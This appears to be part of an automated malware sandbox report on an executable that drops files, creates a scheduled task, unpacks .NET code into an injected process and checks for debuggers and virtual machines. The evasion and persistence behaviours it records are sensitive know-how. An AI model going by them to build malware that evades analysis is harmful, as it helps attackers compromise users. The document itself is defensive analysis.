Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Jump to behavior

Source: J2NWKU2oJi.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbTSw source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 20.2.OpenWith.exe.1bd77939d60.1.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.2.OpenWith.exe.1bd77939d60.1.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, Runtime.cs	.Net Code: CoreMain

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00D0D3E9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

22_2_00D0D3E9

Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E3E4E push edi; iretd	16_3_027E3E55
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E5CD2 push dword ptr [edx+ebp+3Bh]; retf	16_3_027E5CDF
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E3B74 pushad ; retf	16_3_027E3B83
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E4305 push F693B671h; retf	16_3_027E430A
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E45FC push esi; ret	16_3_027E4600
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E21EF push ecx; iretd	16_3_027E21FB
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E0FCE push eax; retf	16_3_027E0FCF
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E4FC8 push es; ret	16_3_027E4FC9
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E21AF pushad ; ret	16_3_027E21B7
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6374CA0 push edx; ret	20_3_00007DF4B6374CAB
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6379D1E push esi; retf 000Ah	20_3_00007DF4B6379D1F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CFED7C push ecx; ret	22_2_00CFED8F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D1F2BB push ss; iretd	22_2_00D1F2BC
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CFF426 push ecx; ret	22_2_00CFF439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A6ED7C push ecx; ret	23_2_00A6ED8F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A8F2BB push ss; iretd	23_2_00A8F2BC
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A6F426 push ecx; ret	23_2_00A6F439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A6F426 push ecx; ret	24_2_00A6F439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A6ED7C push ecx; ret	24_2_00A6ED8F

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	File created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Jump to dropped file
Source: C:\Windows\System32\OpenWith.exe	File created: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

File created: C:\Windows\Tasks\Dctooux.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00CFDBB8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

22_2_00CFDBB8

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MP.EXEX64DBG.EXEX32DBG.E
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU""X

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Source: C:\Windows\System32\OpenWith.exe

Code function: 20_3_00007DF4B636ABBE str word ptr [ebp+ecx*4+05h]

20_3_00007DF4B636ABBE

Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	API coverage: 1.3 %

Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 5888	Thread sleep time: -3000000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 2792	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 2140	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 5888	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\SysWOW64\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Windows\System32\OpenWith.exe

Code function: 20_3_00007DF4B6388E20 GetLogicalDriveStringsW,

20_3_00007DF4B6388E20

Source: C:\Windows\System32\OpenWith.exe

Code function: 20_3_00007DF4B63E7344 GetSystemInfo,

20_3_00007DF4B63E7344

Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Thread delayed: delay time: 30000

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: dialer.exe, 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: HGfS09
Source: J2NWKU2oJi.exe, 00000000.00000002.1772749377.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: OpenWith.exe, 00000014.00000003.2378242743.000001BD776C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 00000014.00000002.2583923900.000001BD776AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SyT
Source: Yuem.exe, 00000016.00000003.2535201056.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
